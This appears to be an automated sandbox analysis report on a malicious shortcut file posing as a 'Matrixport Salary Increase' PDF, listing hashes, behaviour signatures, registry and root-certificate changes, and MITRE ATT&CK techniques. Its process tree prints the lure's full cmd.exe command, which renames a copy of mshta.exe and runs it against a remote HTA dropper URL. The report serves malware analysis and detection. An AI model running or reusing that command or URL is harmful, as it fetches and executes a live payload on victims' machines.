0b79e1194644431c2e28c48aa3654e658a2907e1003cd0484cd00a0796ebe6bb

General

Target

Matrixport Salary Increase.pdf.lnk
Size

391KB
MD5

47429bf0f19ab16bd659c9039b164a9e
SHA1

954493af1b8402a3dd27c4081724678adc522777
SHA256

0b79e1194644431c2e28c48aa3654e658a2907e1003cd0484cd00a0796ebe6bb
SHA512

c88734121ed700bdad92ba8525b180a5b345995d0114c5ab46b3f6fd05bd7caae75ea329c4e9e4fab5939ba1ad4db467fabdbc05812314e65959ccab2d391a22
SSDEEP

12288:ZGtnJ/gnqf+ys4BTC6jQcQovnjTuZrDIh:ZMntn+yFTd/jqJa

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://ms.onlineshares.cloud/WpY6pcQaHB5FyGgjo48r/RkErGkgsq73IIAq0bSVo04=

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
4	668	mshta.exe
6	668	mshta.exe
8	668	mshta.exe
10	668	mshta.exe
12	668	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\370A8E4D61C1A1844F5700E86A519520E84A7F73\Blob = 0f00000001000000200000008624090cc05d981e3ccae5af439d5888468b4b072cbf3a75071e0a1bf70cafc4030000000100000014000000370a8e4d61c1a1844f5700e86a519520e84a7f732000000001000000f9020000308202f5308201dda0030201020210524f112198560198b377baa7c1116839300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3232303832333133303030305a170d3237303832323133303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100a47e4105d1b4ac112ed8cd21e7937329706277e4cde8fa4426e392dd064c91b773022dd691c7826f3608bd174dcda48e926b8c0e2321b585d896e396f95beeb79ccb2c59a5f1cbef24c0aebdb8a1460a03e134772399c5eca1a5ca6bedd2cad58ea2d9eff4e0fe5ac55a26573ca7c3ac5b8c39f09ab3f9d1518a917a3f08ddc106df862cd1afae14dfd2e7722437832ff88bca57d1209bcfde4c7fd1e336ab595c33d1f5b551e5d3d9bb668d84274d7179cfb68a8732d13c2a712804b75e7128304657f9eeaf70fd61b93c56af1c87b6fa078ead43340da255442070d0d58ce4ba80f3641ae394eac156f76c9b264b12da667d5ca218faa0074870447082ebcb0203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e0416041420200b52a941afc9c8f8ed4af91f16f546191a8f300d06092a864886f70d01010b0500038201010015691fc233854166b4c7b104a8b1fd45589d88db9cca3afc61c094170616f062739765013ea1efad834bd14331ef553818ce4f213d1cd28a575e23730d73c5d5f8d5e0042d334602279103facb0b60847f2d534402cf0dee1a5a9337dc5029b3f9b059301f5d683f70899acff092c68526fef17d2137a4cf6822c9c1eea87a8ecb6cb83352a03a5f1bb14e11afabd60e3b92f6b1a82590528f4cf5a3a0abec39f16800f376dcc9cfed1f71792af9e5fbcae094f356ef703a1cee9d300a6b6b7ec32a07ed7353af088ffb5021c2cb4ba4773deef0697aeaec0c2b1b5b79d35559cb2bb631bd10001a2a3a26803a05e22e17a9ca5974d4e22db4adf5adb1005708	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\370A8E4D61C1A1844F5700E86A519520E84A7F73	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\370A8E4D61C1A1844F5700E86A519520E84A7F73\Blob = 14000000010000001400000020200b52a941afc9c8f8ed4af91f16f546191a8f030000000100000014000000370a8e4d61c1a1844f5700e86a519520e84a7f730f00000001000000200000008624090cc05d981e3ccae5af439d5888468b4b072cbf3a75071e0a1bf70cafc42000000001000000f9020000308202f5308201dda0030201020210524f112198560198b377baa7c1116839300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3232303832333133303030305a170d3237303832323133303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100a47e4105d1b4ac112ed8cd21e7937329706277e4cde8fa4426e392dd064c91b773022dd691c7826f3608bd174dcda48e926b8c0e2321b585d896e396f95beeb79ccb2c59a5f1cbef24c0aebdb8a1460a03e134772399c5eca1a5ca6bedd2cad58ea2d9eff4e0fe5ac55a26573ca7c3ac5b8c39f09ab3f9d1518a917a3f08ddc106df862cd1afae14dfd2e7722437832ff88bca57d1209bcfde4c7fd1e336ab595c33d1f5b551e5d3d9bb668d84274d7179cfb68a8732d13c2a712804b75e7128304657f9eeaf70fd61b93c56af1c87b6fa078ead43340da255442070d0d58ce4ba80f3641ae394eac156f76c9b264b12da667d5ca218faa0074870447082ebcb0203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e0416041420200b52a941afc9c8f8ed4af91f16f546191a8f300d06092a864886f70d01010b0500038201010015691fc233854166b4c7b104a8b1fd45589d88db9cca3afc61c094170616f062739765013ea1efad834bd14331ef553818ce4f213d1cd28a575e23730d73c5d5f8d5e0042d334602279103facb0b60847f2d534402cf0dee1a5a9337dc5029b3f9b059301f5d683f70899acff092c68526fef17d2137a4cf6822c9c1eea87a8ecb6cb83352a03a5f1bb14e11afabd60e3b92f6b1a82590528f4cf5a3a0abec39f16800f376dcc9cfed1f71792af9e5fbcae094f356ef703a1cee9d300a6b6b7ec32a07ed7353af088ffb5021c2cb4ba4773deef0697aeaec0c2b1b5b79d35559cb2bb631bd10001a2a3a26803a05e22e17a9ca5974d4e22db4adf5adb1005708	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\370A8E4D61C1A1844F5700E86A519520E84A7F73\Blob = 19000000010000001000000069809c105538bdbc392da857a453d7270f00000001000000200000008624090cc05d981e3ccae5af439d5888468b4b072cbf3a75071e0a1bf70cafc4030000000100000014000000370a8e4d61c1a1844f5700e86a519520e84a7f7314000000010000001400000020200b52a941afc9c8f8ed4af91f16f546191a8f2000000001000000f9020000308202f5308201dda0030201020210524f112198560198b377baa7c1116839300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3232303832333133303030305a170d3237303832323133303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100a47e4105d1b4ac112ed8cd21e7937329706277e4cde8fa4426e392dd064c91b773022dd691c7826f3608bd174dcda48e926b8c0e2321b585d896e396f95beeb79ccb2c59a5f1cbef24c0aebdb8a1460a03e134772399c5eca1a5ca6bedd2cad58ea2d9eff4e0fe5ac55a26573ca7c3ac5b8c39f09ab3f9d1518a917a3f08ddc106df862cd1afae14dfd2e7722437832ff88bca57d1209bcfde4c7fd1e336ab595c33d1f5b551e5d3d9bb668d84274d7179cfb68a8732d13c2a712804b75e7128304657f9eeaf70fd61b93c56af1c87b6fa078ead43340da255442070d0d58ce4ba80f3641ae394eac156f76c9b264b12da667d5ca218faa0074870447082ebcb0203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e0416041420200b52a941afc9c8f8ed4af91f16f546191a8f300d06092a864886f70d01010b0500038201010015691fc233854166b4c7b104a8b1fd45589d88db9cca3afc61c094170616f062739765013ea1efad834bd14331ef553818ce4f213d1cd28a575e23730d73c5d5f8d5e0042d334602279103facb0b60847f2d534402cf0dee1a5a9337dc5029b3f9b059301f5d683f70899acff092c68526fef17d2137a4cf6822c9c1eea87a8ecb6cb83352a03a5f1bb14e11afabd60e3b92f6b1a82590528f4cf5a3a0abec39f16800f376dcc9cfed1f71792af9e5fbcae094f356ef703a1cee9d300a6b6b7ec32a07ed7353af088ffb5021c2cb4ba4773deef0697aeaec0c2b1b5b79d35559cb2bb631bd10001a2a3a26803a05e22e17a9ca5974d4e22db4adf5adb1005708	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	mshta.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1852 wrote to memory of 756	1852	cmd.exe	28
PID 1852 wrote to memory of 756	1852	cmd.exe	28
PID 1852 wrote to memory of 756	1852	cmd.exe	28
PID 756 wrote to memory of 668	756	cmd.exe	29
PID 756 wrote to memory of 668	756	cmd.exe	29
PID 756 wrote to memory of 668	756	cmd.exe	29

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Matrixport Salary Increase.pdf.lnk"
1⤵
- Suspicious use of WriteProcessMemory
PID:1852
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c type C:\Windows\system32\msh*.exe>C:\Users\Public\msh&ren C:\Users\Public\* *ta.exe&for %i IN (C:\Users\Public\ms*.exe) DO start /b %~ni "https://ms.onlineshares.cloud/WpY6pcQaHB5FyGgjo48r/RkErGkgsq73IIAq0bSVo04="
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:756
- - \??\c:\windows\system32\mshta.exe
    mshta "https://ms.onlineshares.cloud/WpY6pcQaHB5FyGgjo48r/RkErGkgsq73IIAq0bSVo04="
    3⤵
    - Blocklisted process makes network request
    - Modifies Internet Explorer settings
    - Modifies system certificate store
    PID:668

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1852-54-0x000007FEFC341000-0x000007FEFC343000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads